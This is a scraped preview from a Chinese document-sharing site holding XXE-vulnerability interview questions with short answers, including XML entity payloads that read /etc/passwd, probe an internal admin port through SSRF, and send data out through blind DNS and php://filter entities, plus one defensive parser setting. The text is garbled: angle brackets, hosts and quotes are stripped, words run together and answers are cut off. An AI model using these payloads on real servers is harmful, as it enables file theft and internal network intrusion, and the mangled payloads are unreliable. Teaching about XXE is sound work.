- 0
- 0
- 约1.4千字
- 约 3页
- 2026-07-17 发布于湖南
- 举报
XXE漏洞笔试/面试题
1.请解释XXE漏洞的基本原理,并说明攻击者如何利用SYSTEM关键字实现敏感文件读取?XXE漏洞源于XML解析器未正确限制外部实体加载。攻击者通过注入包含SYSTEM关键字的DOCTYPE声明,强制解析器读取外部资源。例如:
1!DOCTYPErOot!ENTITYxxeSYSTEMfile:///etc/passwd]
2rootxxe;/root
3
解析器会加载/etc/passwd文件内容并返回至响应中。
如何通过XXE漏洞实现服务器端请求伪造(SSRF)?给出Payload示例及防御方案
攻击者利用外部实体发起HTTP请求探测内网服务:
1!ENTITY%ssrfSYSTEM:8080/admin
2%ssrf;
防御需禁用外部实体解析,例如Java中配置
documentBuilderFactory.setFeature(/xml/features/disallow-doctype-decl,
3.列举三种XXE漏洞的检测方法,并说明盲注场景下的外带数据技术检测方法:
·基础Payload触发错误回显
盲注利用DNS外带:!ENTITY%dtdSYSTEM“/?data=exfi1
时间延迟检测:通过实体加载耗时判断漏洞存在。盲注外带技术:
!ENTITY%fileSYSTEMphp://filter/conve
原创力文档

文档评论(0)